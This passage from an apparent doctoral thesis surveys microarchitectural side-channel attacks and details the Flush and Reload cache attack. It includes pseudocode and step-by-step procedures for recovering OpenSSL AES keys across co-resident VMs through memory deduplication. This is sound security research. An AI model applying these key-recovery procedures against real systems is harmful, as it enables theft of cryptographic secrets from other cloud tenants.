ters are explained to profile different benchmarks. In 2008, Uhsadel et al. [UGV08]
showed that hardware performance counters can be used to perform cache attacks
by looking at the L1 and L2 D-cache misses. In 2013, Weaver et al. [WTM13] inves-
tigated x86 64 systems to analyze deterministic counter events, concluding that non-
x86 hardware has more deterministic counters. In 2015, Bhattacharya et al. [BM15]
showed how to use the branch prediction events in hardware performance counters
to recover 1024 bit RSA keys in Intel processors.
3.2.5 Special Instructions
The set of instructions that a CPU can understand and execute is refered as instruc-
tion set architectures (ISA). Although usually composed of common instructions
(e.g. mov or add), some ISAs include a set of special instructions that aim at imple-
menting system functionalities that the system cannot implement by itself. One of
these examples are CPUs with a lack of memory coherence protocols. In these cases,
special instructions are needed to handle the situation of conflicted (thus incoherent)
values between the DRAM and the cache hierarchy.
For instance, the Intel x86 64 ISA provides the clflush instruction to solve the
problem. The clflush instruction evicts the desired data from the cache hierarchy,
thus making sure that the next data fetch will come from the DRAM. Since ARM-
V8, ARM processors started including similar instructions in their ISA. Although
these instructions might become crutial for certain processors, they also serve as
helpers to implement microarchitectural attacks. In fact many times an attacker
is willing to evict a shared variable from the cache, either to reload it later [YF14,
LGS+16, IES16], to measure the flushing time [GMWM16] or to access the DRAM
continuously [KDK+14a].
A similar situation can be observed with instructions added to utilize hardware
random number generators. In particular, it has recently been shown that, due to
the low throughput of the special rdseed instruction, a covert channel can be im-
plemented by transmitting different bits when the rdseed is exhaustively used/not
used [EP16].
26
3.2.6 Hardware Caches
Modern cache structures, as shown in Figure 2.2, are usually divided into core-
private L1 instruction and data caches, and at least one level of unified core-shared
LLC. The instruction cache (I-cache) is the part of the L1 cache responsible for stor-
ing recently executed instructions by the CPU. In 2007, Aciicmez [Acı07] showed the
applicability of I-cache attacks by exploiting the cipher accesses to recover an 1024-
bit RSA secret key. The monitored I-cache sets are filled with dummy instructions
by a spy process whose access is later timed to recover a RSA decryption key. After
one year, Aciicmez et al. [AS08] demonstrated the power of the I-cache attacks on
OpenSSL RSA decryption processese that use Chinese Remainder Theorem (CRT),
Montgomery’s multiplication algorithm and blinding to modular exponentiation. In
2010, Aciicmez et al. [ABG10] revisited I-cache attacks. In this work, the attack
is automated by using Hidden Markov Models (HMM) and vector quantization to
attack OpenSSL’s DSA implementation. In 2012, Zhang et al. [ZJRR12] published a
paper on cross-VM attacks in the same core using L1-data cache. The attack targets
Libgcrypt’s ElGamal decryption process to recover the secret key. To eliminate the
noise Support Vector Machine algorithm is applied to classify square, multiplication
and modular reduction from the L1-data cache accesses. The output of SVM is
given to HMM to reduce the noise and increase the reliability of the method. This
paper demonstrates the first study in cross-VM setup using L1-data cache. Finally,
in 2016, Zankl et al. [ZHS16] proposed an automated method to find the I-cache
leakage in RSA implementations of various cryptographic libraries. The correlation
technique shows that there are still many libraries which are vulnerable to I-cache
attacks.
The data cache stores recently accessed data, and as with the I-cache, it has
been widely exploited to recover sensitive information. As soon as 2005, Percival et
al. [Per05] demonstrated the usage of the L1-data cache as a covert-channel to exploit
information from core co-resident processes. To demonstrate the efficiency of the
side channel, the OpenSSL RSA implementation is targeted. The main reason of the
leakage is that the different precomputed multipliers are loaded into different L1-data
cache lines. By profiling each corresponding set it is possible to recover more than
half of the bits of the secret exponent. A year later, Osvik et al. [OST06] presented
thePrime and Probe and Evict and Time attacks, which were utilized to recover
AES cryptographic keys. In 2007, Neve et al. [NS07] showed that it is possible
to use L1-data cache as a side channel in single-threaded processors by exploiting
the OS scheduler. This technique was applied to the last round of OpenSSL’s
AES implementation where only one T-table is used. The authors recovered the
last round key with 20 ciphertext/accesses pairs. In 2009, a new type of attack is
presented by Brumley et al. [BH09] where L1-data cache templates are implemented
to recover OpenSSL ECC decryption keys. The goal of this method is to automate
cache attacks by applying HMM and vector quantization in Pentium 4 and Intel
Atom. Finally in 2011, Gullasch et al. [GBK11] presented the Flush and Reload
27
attack, although the attack would acquire its name later. The study demonstrated
that it is possible to affect the Linux’ Completely Fair Scheduler (CFS) to interrupt
the AES thread and recover the AES encryption key with very few encryptions.
LLC attacks
In 2014, Yarom et al. [YF14] implemented, for the first time, the Flush and Reload
attack across cores/VMs to recover sensitive information aided by memory dedupli-
cation mechanisms. The attack is applied to the GnuPG implementation of RSA.
With this work the Flush and Reload attack became popular and more scenarios
in which it could be applied arised. For instance, Benger et al. [BvdPSY14] pre-
sented the Flush and Reload attack on the ECDSA implementation of OpenSSL. In
the same year, Irazoqui et al. [IIES14b] applied Flush and Reload to recover AES
encryption keys across VMs. This attack is implemented in VMware platforms to
show the strength of the attack in virtualized environments. Shortly later, Zhang
et al. [ZJRR14] showed the applicability of the Flush and Reload attack to verify
the co-location in PaaS clouds and obtain the number of items of a co-resident users
shopping cart. In 2015, Irazoqui et al. [IIES15] showed that it is possible to recover
sensitive data from incorrectly CBC-padded TLS packets. In the same year, Gruss
et al. [GSM15] presented an automated way to catch LLC cache patterns apply-
ingFlush and Reload method and consequently detect keys strokes pressed by the
victim.
Finally, hypervisor providers disabled the de-duplication feature to prevent Flush
and Reload attacks in their platforms. Therefore, there was a need to find a new way
to target the LLC. Concurrently, Irazoqui et al. [IES15a] and Liu et al. [Fan15] de-
scribed how to apply Prime and Probe attack in LLC on deduplication-free systems.
While Irazoqui et al. [IES15a] applied the method to recover OpenSSL AES last
round key in VMware and Xen hypervisors, Liu et al. [Fan15] demonstrated how to
recover El Gamal decryption key from the recent GnuPG implementation. In 2016,
Inci et al. [IGI+16b] showed that commercial clouds are not immune to these attacks
and applied the same technique in the commercial Amazon EC2 cloud to recover
2048 bit RSA key from Libgcrypt implementation. Moreover, Oren et al. [OKSK15]
presented the feasibility of implementing cache attacks trough javascript executions
to profile incognito browsing.
In the same year, Lipp et al [LGS+16] applied three different methods ( Prime
and Probe ,Flush and Reload and Evict+Reload) to attack ARM processors typi-
cally used in mobile devices. The success of the work showed that it is possible to
implement cache attacks in mobile platforms.
3.2.7 Cache Internals
With novel an more complex cache designs, which include many undocumented fea-
tures, it become increasingly difficult to obtain the necessary knowledge to use it as
28
a covert channel. Aiming at correctly characterizing the usage of the caches as an
attack vector, researchers started investigating their designs. An example of these
features are the LLC slices, selected by an undocumented hash functions in Intel
processors. In 2015, the first LLC slice reverse engineering was applied by Irazoqui
et al. [IES15b] utilizing timing information to recover slice selection algorithms of
a total of 6 different Intel processors. Later, Maurice et al. [MSN+15] presented
a more efficient method using performance counters to recover slice selection algo-
rithm. Later,Inci et al. [IGI+16b] and Yarom et al. [YGL+15] again utilized timing
information to recover non-linear slice selection algorithms. Finally, in 2016, Yarom
et al. [YGH16] exploited the cache-bank conflicts on the Intel Sandy Bridge proces-
sors. The study shows that cache-banks in L1 cache can be used to recover an RSA
key if the hyper-threading is implemented in the core.
3.2.8 Cache Pre-Fetching
Pre-fetching is a commonly used method in computer architecture to provide bet-
ter performance to access instructions or data from local memory. It consists on
predicting the utilization of a cache line and fetching it to the cache prior to its
utilization. In 2014, Liu et al. [LL14] suggested that previous architectural counter-
measures do not provide sufficient prevention against demand-fetch policy of shared
cache. Thus, to prevent the pre-fetching attacks they propose a randomization pol-
icy for the LLC where a cache miss is not sent to the CPU, but instead perform
randomized fetches to neighborhood of the missing memory line. In 2015, Rebeiro
et al. [RM15] presented an analysis of sequential and arbitrary-stride pre-fetching on
cache timing attacks. They conclude that ciphers with smaller tables leak more than
ciphers with large tables due to data pre-fetching. In 2016, Gruss et al. [GMF+16]
utilized the pre-fetching instructions to obtain the address information by defeating
SMAP, SMEP and kernel ASLR.
3.2.9 Other Attacks on Caches
Other attacks have exploited different characteristics of a process rather than exe-
cution time and cache accesses . In 2010, Kong et al. [KJC+10] presented a thermal
attack on I-cache by checking the cache thermal sensors. They showed that dynamic
thermal management (DTM) is not sufficient to prevent the thermal attacks if the
malicious codes target a specific section of I-cache. In 2015, Masti et al. [MRR+15]
expanded the previous work to multi-core platforms. They used core temperature
as a side channel to communicate with other processes. In the same year, Riviere et
al. [RNR+15] targeted I-cache by electromagnetic fault injection (EMFI) on the con-
trol flow. They showed that the applicability of the fault injection is trivial against
cryptographic libraries even if they have countermeasures against fault attacks. In
2016, researchers focused on Spin-Transfer Torque RAM (STTRAM), a promising
feature for cache applications. Rathi et al. [RDNG16] proposed three new tech-
29
niques to handle magnetic field and temperature of processor. The new techniques
are stalling, cache bypass and check-pointing to establish the data security and the
performance degradation is measured with SPLASH benchmark suite. In the same
year, Rathi et al. [RNG16] exploited read/write current and latency of STTRAM
architecture to establish a side channel inside LLC.
3.2.10 Memory Bus Locking Attacks
So far it has been shown how an attacker can create contention at different cache
hierarchy levels to retrieve secret information from a co-resident user. Memory bus
locking attacks are different in this sense, since they do not have the ability to
recover fine-grain information. Yet, they can be utilized to perform a different set of
malicious actions or as a pre-step to the performance of more powerful side channel
attacks.
When two different threads located in different cores operate on the same shared
variable, the value of the shared variable retrieved by each thread might be different,
since modifications might only be performed to core-private caches. This is called
a data race. In order to solve this, atomic operations operate in shared variables
in such a way that no other thread can see the modification half-complete. For
that purpose, atomic operations usually utilize lock prefixes to ensure the particular
shared variable in the cache hierarchy is locked until one of the threads has finished
updating the value.
The lock instructions work well when the data to be locked fits into a single
cache line. However, if the data to be locked spans more than one cache line,
modern CPUs cannot issue two lock instructions in separate cache lines at the same
time [IGES16]. Instead, modern CPUs adopt the solution of flushing any memory
operation from the pipeline, incurring in several overheads that can be utilized by
users with malicious purposes.
In fact, there are several examples of malicious usage of memory bus locking
overheads. For instance, Varadarajan et al. [VZRS15], Xu et al. [XWW15] and Inci
et al. [IGES16] utilized this mechanism to detect co-residency in IaaS clouds by
observing the performance degradation in http queries to the victim. Finally, Inci
et al. [IIES16] and Zhang et al. [ZZL17] utilized memory bus locking effects as a
Quality of Service (QoS) degradation mechanism in IaaS clouds.
3.2.11 DRAM and Rowhammer Attacks
The DRAM, often also called the main memory, is the hardware component in
charge of providing memory pages to executed programs. There are two major
attacks targeting the DRAM: the rowhammer attack and DRAMA side channel
attacks. Since both attacks utilize different concepts and have different goals, we
proceed to explain them separately.
30
The DRAM is usually divided into several categories, i.e., channels (physi-
cal links between DRAM and memory controller), Dual Inline Memory Modules
(DIMMS, physical memory modules attached to each channel), ranks (back and
front of DIMMS), banks (analogous to cache sets) and rows (analogous to cache
lines). Two addresses are physical adjacent if they share the same channel, DIMM,
rank and bank. Additionally each bank contains a row buffer array that holds the
most recently accessed row. DRAMA side channel attacks take advantage of the
fact that accessing a DRAM row from the row buffer is faster in time that having
a row buffer miss. Thus, similar to the fact observed in cache attacks, an attacker
can create collisions in a banks row buffer to infer information about a co-resident
victim.
The rowhammer attack takes advantage of the influence that accesses to a row
in a particular bank of the DRAM have in adjacent rows of the same bank. In fact,
continuous accesses can increase the charge leak rate of adjacent rows. Typically
processors have a refresh rate (at which they refresh their values) to avoid the
complete charge leak of cells in a DRAM row. However, if the charge leak rate
is faster than the refresh rate, then some cells completely loose their charge before
their value can be refreshed, incurring in bit flips. These bit flips can be particularly
dangerous if adjacent rows contain security critical information.
The rowhammer attack has been more exploited than the DRAMA side channel
attack. In fact, since it was discovered [KDK+14a], rowhammer has been shown to
be executable from a javascript extension [GMM16], in mobile devices [vdVFL+16],
or even from a IaaS VM to break the isolation provided by the hypervisor [XZZT16].
Further, it has been shown that it can be utilized as a mechanism to inject faults
into cryptographic keys that can lead to their full exposure [BM16].
3.2.12 TEE Attacks
Trusted Execution Environmnets (TEE) are designed with the goal of executing
processes securely in isolated environments, including powerful adversaries such as
malicious Operating Systems. In order to achieve this goal, TEEs usually work,
among others, with encrypted DRAM memory pages. However, TEEs still utilize
the same hardware components as untrusted execution environments, and thus most
of the above explained microarchitectural attacks are still applicable to processes
executed inside a TEE. Examples of TEEs are the well known Intel SGX [Sch16]
and the ARM TrustZone [ARM09].
Perhaps the distinguishing fact when discussing the applicability of microarchi-
tectural attacks to TEE is the DRAM memory encryption. While in fact TEE
DRAM memory pages are encrypted, this data is decrypted when placed in the
cache hierarchy for faster access by the CPU. This implies that any of the above
discussed cache hierarchy attacks is still applicable against TEE environments, as
nothing stops an attacker from creating cache contention and obtaining decrypted
TEE information. More than that, a malicious OS can schedule processes in any
31
way it wants, interrupt the victim process after every small number of cycles or
prevent it from using side channel free hardware resources (e.g. AES-NI [TNM11]).
Thus, compared to the low resolution that microarchitectural attackers obtain from
a commercial OS, a malicious OS obtains a much higher resolution as it can observe
every single memory access made by the victim.
A similar issue is experienced with BPU microarchitectural attacks. BPU attacks
were largely dismissed due to their core co-residency limitation (BPU are core-
private resources) and their low access distinguishability. However, the whole picture
changes when a malicious OS comes into play. Once again, malicious OS are in
control of the scheduling of the processes being executed in the system. Thus, they
are in control of where and when each process executes, i.e., they can schedule
malicious processes in the same core as the victim process. The situation becomes
even more dangerous when special instructions are available from an OS to better
control the outcome of the branches executed [LSG+16].
Although DRAM row access and memory bus locking attacks have still not been
shown to be applicable in the TEE scenario, the theoretical characteristics of these
attacks suggest that both attacks will be soon demonstrated to be applicable in
TEEs. In fact there is nothing theoretically solid that suggests TEE would prevent
memory bus locking attacks. As for the DRAM access attacks our assumption is
that it will depend on how the DRAM rows are placed in the row buffer array. If
these are placed unencrypted, then the attack would be equally viable. Rowhammer,
on the contrary, is assumed to be defeated by memory authentication and integrity
mechanisms being utilized by TEEs.
3.2.13 Cross-core/-CPU Attacks
Multiple microarchitectural attacks have been reviewed in the previous paragraphs,
but it has not been discussed how their applicability improved over the years. In
fact, microarchitectural attacks have improved their practicality since they were
implemented for the first time in 2005. Not in vain, the first microarchitectural
attacks (i.e. those targeting the L1 and BPU) were largely dismissed almost for
several years, as they were only applicable if victim and attacker shared the same
CPU core. In a multi-core system world, this restriction seemed to be the main
limitation that prevented microarchitectural attacks from being considered as a
threat.
It was in 2013 when the first cross-core cache attack was presented, even though
it required that victim and attacker shared memory pages. Later this requirements
would be eliminated, making cross-core cache attacks applicable in almost every
system. However, there was a requirement that microarchitectural attacks did not
accomplish yet, i.e., to be applicable even when victim and attacker share the un-
derlying hardware but are located in different CPU sockets.
The microarchitectural attack cross-CPU applicability would later be accom-
plished by cache coherency protocol attacks, rowhammer, DRAMA and memory
32
bus locking attacks. Indeed all of them target resources that are shared not only
by every core, but farther by every CPU socket in the system. As explained in the
previous paragraphs, the first targets the cache coherence protocol characteristics,
the next two target the DRAM characteristics, while the latter targets the memory
bus characteristics.
In short, microarchitectural attacks have experienced a huge popularity increase
in the last years, specially for their improved characteristics and applicability. While
they were largely dismissed at the beginning for being applicable in private core-
resources, current microarchitectural attacks are applicable even across CPU sockets.
33
Chapter 4
TheFlush and Reload attack
Until 2013 microarchitectural attacks have been largely disregarded by the commu-
nity, mainly due to their lack of applicability in real world scenarios. In particular,
they have suffered from the following limitations:
•Microarchitectural attacks were only shown to be successful in core-private
resources, like the L1 caches and the BPUs. With the wide utilization of
multi-core systems, the restriction of having to be located in the same core
with the victim seems a huge obstacle when it comes to the applicability of
microarchitectural attacks.
•Core-private resources usually exhibit low resolution to execute microarchi-
tectural attacks. For instance, L1 and L2 accesses only differ in a few cycles.
BPU misspredictions are also hardly distinguishable as their penalties have
been largely optimized. Therefore, core-private resources are less likely to
resist the amount of noise typically observed in real world scenarios.
•Before 2013 microarchitectural attacks lacked of real world scenarios in which
they could be applied, as they usually demanded a highly controlled environ-
ment.
In order to increase the applicability of microarchitectural attacks it is necessary
to investigate and discover new covert channels that can be exploited across cores
and be resistant to the typical amount of noise seen in modern technology usage en-
vironments. The only work prior to ours that investigated cross-core covert channels
is [YF14], in which a RSA key is recovered through the Last Level Cache (LLC).
This sections expands on [YF14], demonstrating that LLC attacks can recover a
wider range of information in a number of scenarios.
The first attack that we discuss is the Flush and Reload attack, first applied
in the L1 in [GBK11], which acquired its name in [YF14]. The Flush and Reload
attack utilizes the LLC as the covert channel to recover information, and prior to
this work, was only shown to be applicable across processes being executed in the
34
same OS. In this chapter we demonstrate how such an attack can be utilized to
recover fine-grain information from a co-resident VM placed in a different core. In
particular,
•We demonstrate that Flush and Reload can recover information from co-
resident VMs in hypervisors as popular as VMware.
•We expand on the capabilities of Flush and Reload by recovering an AES key
in less than a minute.
•We show that microarchitectural attacks can be applied against high level
protocols by recovering TLS session messages.
4.1 Flush and Reload Requirements
We cannot start discussing the functionality of the Flush and Reload attack with-
out first mentioning the requirements that are needed to successfully apply it. In
particular the Flush and Reload attack has four very important pre-requisites that
have to be met in the targeted system to succeed:
•Shared memory with the victim: The Flush and Reload attack assumes
that attacker and victim share at least the targeted memory blocks in the
system, i.e., both access the same physical memory address. Although this
requirement might seem difficult to achieve, we discuss in Section 4.2 the
scenarios in which memory sharing approaches are implemented.
•CPU socket co-residency: The Flush and Reload attack is only applica-
ble if attacker and victim co-reside in the same CPU socket, as the LLC is
only shared across cores and not across CPU sockets. Note that, unlike prior
microarchitectural attacks, core co-residency is not necessary.
•Inclusive LLC: The Flush and Reload attack requires the inclusiveness prop-
erty in the LLC. This, as we will see in section 4.4.1, is necessary to be able
to manipulate memory blocks in the upper level caches. The vast majority of
intel processors feature an inclusive LLC. However, as we will see in Section 5,
similar technical procedures can exploit non-inclusive caches through cache
coherence covert channels.
•Access to a flushing instruction: The Flush and Reload attack needs of
a very specific instruction in the Instruction Set Architecture (ISA) capable
of forcing memory blocks to be removed from the entire cache hierarchy. In
x86-64 systems, this is provided trough the clflush instruction.
35
Without any of these four requirements the Flush and Reload attack is not
able to successfully recover data from a victim. Two of them can be assumed to be
easily achievable in Intel processors, as they feature inclusive LLCs and the clflush
instruction is accessible from userspace. The CPU socket co-residency should also
be easily accomplished, as modern computers do not usually feature more than
two CPU sockets. However, the shared memory requirement might be harder to
achieve. In the following section we describe mechanisms under which different
processes/users share the same physical memory.
4.2 Memory Deduplication
Although the idea of different processes/users sharing the same physical memory
might seem threatening, the truth is we encounter mechanisms that permit it in pop-
ular OS and hypervisors. In particular, all linux OS implement the so called Kernel
Samepage Merging (KSM) mechanism, which merges duplicate read-only memory
pages belonging to different processes. Consequently KVM, a linux based hyper-
visor, features the same mechanisms across different VMs. Furthermore, VMware
implements Transparent Page Sharing (TPS), a similar mechanism to KSM that
also allows different VMs to share memory.
Even though the deduplication optimization method saves memory and thus
allows more virtual machines to run on the host system, it also opens a door to side
channel attacks. While the data in the cache cannot be modified or corrupted by an
adversary, parallel access rights can be exploited to reveal secret information about
processes executed in the target VM. We will focus on the Linux implementation of
Kernel Samepage Merging (KSM) memory deduplication feature and on the TPS
mechanism implemented by VMware. We describe in detail the functionality of
KSM, but the same procedure is implemented by TPS.
KSM is the Linux memory deduplication feature implementation that first ap-
peared in Linux kernel version 2.6.32 [Jon10, KSM]. In this implementation, KSM
kernel daemon ksmd , scans the user memory for potential pages to be shared among
users [AEW09]. Also, since it would be CPU intensive and time consuming, in-
stead of scanning the whole memory continuously, KSM scans only the potential
candidates and creates signatures for these pages. These signatures are kept in the
deduplication table. When two or more pages with the same signature are found,
they are cross-checked completely to determine if they are identical. To create sig-
natures, KSM scans the memory at 20 msec intervals and at best only scans the
25% of the potential memory pages at a time. This is why any memory disclosure
attack, including ours, has to wait for a certain time before the deduplication takes
effect upon which the attack can be performed. In our case, it usually took around
30 minutes to share up to 32000 pages. During the memory search, KSM analyzes
three types of memory pages [SIYA12];
•Volatile Pages : Where the contents of the memory change frequently and
36
OpenSSL
Apache
FirefoxApache
OpenSSLOpenSSL
Apache
FirefoxFigure 4.1: Memory Deduplication Feature
should not be considered as a candidate for memory sharing.
•Unshared Pages : Candidate pages for deduplication. The madvise system
call advises to the ksmd to be likely candidates for merging.
•Shared Pages : Deduplicated pages that are shared between users or pro-
cesses.
When a duplicate page signature is found among candidates and the contents are
cross-checked, ksmd automatically tags one of the duplicate pages with copy-on-
write (COW) tag and shares it between the processes/users while the other copy is
eliminated. Experimental implementations [KSM] show that using this method, it
is possible to run over 50 Windows XP VMs with 1GB of RAM each on a physical
machine with just 16GB of RAM. As a result of this, the power consumption and
system cost is significantly reduced for systems with multiple users.
4.3 Flush and Reload Functionality
We described the pre-requisites that the system in which the Flush and Reload
attack will be applied needs to fullfill. If they are satisfied, and assuming victim
and attacker share a memory block b, the Flush and Reload attack can be applied
performing the following steps:
37
Write AccessCopied page 
table that cause 
the time delay1
2 21Figure 4.2: Copy-on-Write Scheme
Flushing stage: In this stage, the attacker uses the clflush command to flush b
from the cache hence making sure that it has to be retrieved from the main
memory next time it needs to be accessed. We have to remark here that
theclflush command does not only flush the memory block from the cache
hierarchy of the corresponding working core, but it is flushed from all the
caches of all the cores due to the inclusiveness LLC property. This is an
important point: if it only flushed the corresponding core’s caches, the attack
would only work if the attacker and victim’s processes were co-residing on the
same core. This would have required a much stronger assumption than just
being in the same physical machine.
Target accessing stage: In this stage the attacker waits until the target runs a
fragment of code, which might use the memory block bthat has been flushed
in the first stage.
Reloading stage: In this stage the attacker reloads again the previously flushed
memory block band measures the time it takes to reload. We perform this
with the popular (and userspace accessible) rdtsc instruction, which counts
the hardware cycles spent doing a process. Before reading the cycle counter
we issue memory barrier instructions ( mfence and lfence ) to make sure all
load and store operations have finished before reading the memory block b.
Depending on the reloading time, the attacker decides whether the victim
accessed the memory block (in which case the memory block would be present
in the cache) or if the victim did not access the corresponding memory block
(in which case the memory block will be fetched from memory).
The timing difference between a cache hit and a cache miss makes the aforemen-
38
0 50 100 150 200 250 300 350 400 450 50000.050.10.150.20.250.3
Hardware cyclesProbability
  
Instruction in cache
Instruction in memoryFigure 4.3: Reload time in hardware cycles when a co-located VM uses the memory
blockb(red, LLC accesses) and when it does not use the targeted memory block b
(blue, memory accesses) using KVM on an Intel XEON 2670
tioned access easily detectable by the attacker. In fact this is one of the big advan-
tages of targeting the LLC as a covert channel. Figure 4.3 shows the reload times
of a memory block being retrieved from the LLC and from the memory, represented
as red and blue histograms respectively. We observe that LLC accesses utilizing
theFlush and Reload technique usually take around 70 cycles, while memory ac-
cesses usually take around 200 cycles. Thus, an attacker using the Flush and Reload
technique can easily distinguish when a victim uses a shared memory block.
Flush and Reload memory targets:
As we explained Flush and Reload targets memory blocks that are shared between
victim and attacker, and mechanisms like KSM can help this phenomenon happen.
However, this also means that Flush and Reload can only target very specific memory
blocks, as KSM only shares read-only memory pages. Functions and data declared
globally usually belong to the kind of memory that an attacker can target with
Flush and Reload . However, dynamically allocated data, as it is modifiable, cannot
be targeted by Flush and Reload . Thus, an attacker needs to pick the application
to attack carefully, taking this consideration into account.
4.4 Flush and Reload Attacking AES
AES has been one of the main targets of cache attacks. For instance, Bernstein
demonstrated that table entries in different cache lines can have different L1 access
times, while Osvik et al. applied the evict and time and the Prime and Probe
39
attack to the L1 cache. In this section we will describe the principles of our Flush and
Reload attack on the C-implementation of AES in OpenSSL . In [GBK11] Gullasch
et al. described a Flush and Reload attack on AES implementation of the OpenSSL
library. However in this study, we are going to use the Flush and Reload method with
some modifications that from our point of view, have clear advantages over [GBK11].
We consider two scenarios: the attack as a spy process running in the same OS
instance as the victim (as done in [GBK11]), and the attack running as a cross-VM
attack in a virtualized environment.
4.4.1 Description of the Attack
As in prior Flush and Reload attacks, we assume that the adversary can monitor
accesses to a given cache line. However, unlike the attack in [GBK11], this attack
•only requires the monitoring of a single memory block; and
•flushing can be done before encryption, reloading after encryption, i.e. the
adversary does not need to interfere with or interrupt the attacked process.
More concretely, the Linux kernel features a completely fair scheduler which tries
to evenly distribute CPU time to processes. Gullasch et al. [GBK11] exploited
Completely Fair Scheduler (CFS) [CFS], by overloading the CPU while a victim
AES encryption process is running. They managed to gain control over the CPU
and suspend the AES process thereby gaining an opportunity to monitor cache
accesses of the victim process. Our attack is agnostic to CFS and does not require
time consuming overloading steps to gain access to the cache.
We assume the adversary monitors accesses to a single line of one of the T tables
of an AES implementation, preferably a T table that is used in the last round of
AES. Without loss of generality, let’s assume the adversary monitors the memory
block corresponding to the first positions of table T, whereTis the lookup table
applied to the targeted state byte si, wheresiis thei-th byte of the AES state before
the last round. Let’s also assume that a cache line can hold nT table values, e.g,
the firstnT table positions for our case. If siis equal to one of the indices of the
monitored T table entries in the memory block (i.e. si∈{0,...,n}if the memory
block contains the first nT table entries) then the monitored memory block will
with very high probability be present in the cache (since it has been accessed by the
encryption process). However, if sitakes different values, the monitored memory
block is not loaded in this step. Nevertheless, since each T table is accessed ltimes
(for AES-128 in OpenSSL ,l= 40 perTj), there is still a probability that the memory
block was loaded by any of the other accesses. In both cases, all that happens after
the T table lookup is a possible reordering of bytes (due to AES’s Shift Rows ),
followed by the last round key addition. Since the last round key is always the same
forsi, thenvalues are mapped to nspecific and constant ciphertext byte values.
This means that for nout of 256 ciphertext values, the monitored memory block
40
willalways have been loaded by the AES operation, while for the remaining 256 −n
values the probability of having been reloaded is smaller. In fact, the probability
that the specific T table memory block ihas not been accessed by the encryption
process is given as:
Pr [no access to T[i]] =(
1−t
256)l
Here,lis the number of accesses to the specific T table. For OpenSSL 1.0.1 AES-
128 we have l= 40. If we assume that each memory block can hold t= 16 entries
per cache line, we have Pr [no access to T[i]] = 7.6%. However, if the T-tables
start at the middle of a cache line, an attacker can be smart enough to target those
memory blocks, for which t= 8 and Pr [no access to T[i]] = 28.6%. Therefore it
is easily distinguishable whether the memory block is accessed or not. Indeed, this
turns out to be the case as confirmed by our experiments.
In order to distinguish the two cases, all that is necessary is to measure the timing
for the reload of the targeted memory block. If the line was accessed by the AES
encryption, the reload is quick; else it takes more time. Based on a threshold that
we will empirically choose from our measurements, we expect to distinguish main
memory accesses from L3 cache accesses. For each possible value of the ciphertext
byteciwe count how often either case occurs. Now, for nciphertext values (the
ones corresponding to the monitored T table memory block) the memory block has
always been reloaded by AES, i.e. the reload counter is (close to) zero. These n
ciphertext values are related to the state as follows:
ci=ki⊕T[
s[i]]
(4.1)
where thes[i]can takenconsecutive values. Note that Eq. (4.1) describes the last
round of AES. The brackets in the index of the state byte s[i]indicate the reordering
due to the Shift Rows operation. For the other values of ci, the reload counter is
significantly higher. Given the nvalues ofciwith a low reload counter, we can solve
Eq. (4.1) for the key byte ki, since the indices s[i]as well as the table output values
T[
s[i]]
are known for the monitored memory block. In fact, we get npossible key
candidates for each ciwith a zero reload counter. The correct key is the only one
that allnvalid values for cihave in common.
A general description of the key recovery algorithm is given in Algorithm 4,
where key byte number 0 is recovered from the ciphertext values corresponding to
nlow reload counter values that were recovered from the measurements. Again,
nis the number of T table positions that a cache line holds. The reload vector
Xi= [x(0),x(1),...,x (255)] holds the reload counter values x(j) for each ciphertext
valueci=j. FinallyK0is the vector that, for each key byte candidate k, tracks
the number of appearances in the key recovery step.
41
Algorithm 4 Recovery algorithm for key byte k0
Input :X0 //Reload vector for ciphertext byte 0
Output :k0 //Correct key byte 0
forallxj∈X0do
//Threshold for values with low reload counter.
ifxj<Low counter threshold then
fors= 0tondo
//xor with each value of the targeted T table memory
block
K0[j⊕T[s]]++;
end
end
end
return argmaxk(K0[k]);
Example
Assume that the cache linee can hold n= 4 T table values and we want to recover key
bytek0. There are four ciphertext values detected with a low reload counter. Assume
further that each c0has been xored with the T table values of the monitored memory
block (the first 4 if we are working with the first positions), giving k(i)
0=ci
0⊕T[
s[0]]
.
For each of the four possibilities of c0, there are n= 4 possible solutions for k0. If
the results are the following:
k(0)
0

43
ba
91
17k(1)
0

8b
91
f3
66k(2)
0

91
45
22
afk(3)
0

cd
02
51
91
And since there is only one common solution between all of them, which is 91, we
deduce that the correct key value is k0= 91. This also means that K0[91] = 4, since
k= 91 appeared four times as possible key candidate in the key recovery step.
Note that this is a generic attack that would apply virtually to any table-based
block cipher implementation. That is, our attack can easily be adapted to other
block ciphers as long as their last round consists of a table look-up with a subsequent
key addition.
4.4.2 Recovering the Full Key
To recover the full key, the attack is expanded to all tables used in the last round,
e.g. the 4 T tables of AES in OpenSSL 1.0.1 . For each ciphertext byte it is
known which T table is used in the final round of the encryption. This means that
42
Algorithm 5 Flush and reload algorithm extended to 16 ciphertext bytes
Input :T00,T10,T20,T30 //Addresses of each T table
Output :X0,X1,...X 15 //Reload vectors for ciphertexts
//EachXkholds 256 counter values
while iteration<total number of measurements do
clflush(T00,T10,T20,T30); // Flush data to the main memory
ciphertext=Encryption(plaintext); // No need to store plaintext!
fori←T00toT30do
time=Reload(i);
iftime>AccessThreshold then
Addcounter( Ti,Xi); // Increase counter of XiusingTi
end
end
end
returnX0,X1,...,X 15
the above attack can be repeated on each byte, by simply analyzing the collecting
ciphertexts and their timings for each of the ciphertext bytes individually. As before,
the timings are profiled according to the value that each ciphertext byte citakes
in each of the encryptions, and are stored in a ciphertext byte vector. The attack
process is described in Algorithm 5. In a nutshell, the algorithm monitors the first
T table memory block of all used tables and hence stores four reload values per
observed ciphertext. Note that, this is a known ciphertext attack and therefore all
that is needed is a flush of one memory block before one encryption. There is no
need for the attacker to gain access to plaintexts.
Finally the attacker should apply Algorithm 4 to each of the obtained ciphertext
reload vectors. Recall that each ciphertext reload vector uses a different T table, so
the right corresponding T table should be applied in the key recovery algorithm.
Performing the Attack. In the following we provide the details about the process
followed during the attack.
Step 1: Acquire information about the offset of T tables The attacker has
to know the offset of the T tables with respect to the beginning of the library.
With that information, the attacker can refer and point to any memory block
that holds T table values even when the ASLR is activated. This means that
some reverse engineering work has to be done prior to the attack. This can be
done in a debugging step where the offset of the addresses of the four T tables
are recovered.
Step 2: Collect Measurements In this step, the attacker requests encryptions
and applies Flush and Reload between each encryption. The information
43
gained, i.e. Ti0was accessed or not, is stored together with the observed
ciphertext. The attacker needs to observe several encryptions to get rid of
the noise and to be able to recover the key. Note that, while the reload step
must be performed and timed by the attacker, the flush might be performed
by other processes running in the victim OS.
Step 3: Key recovery In this final step, the attacker uses the collected measure-
ments and his knowledge about the public T tables to recover the key. From
this information, the attacker applies the steps detailed in Section 7.4.2.1 to
recover the individual bytes of the key.
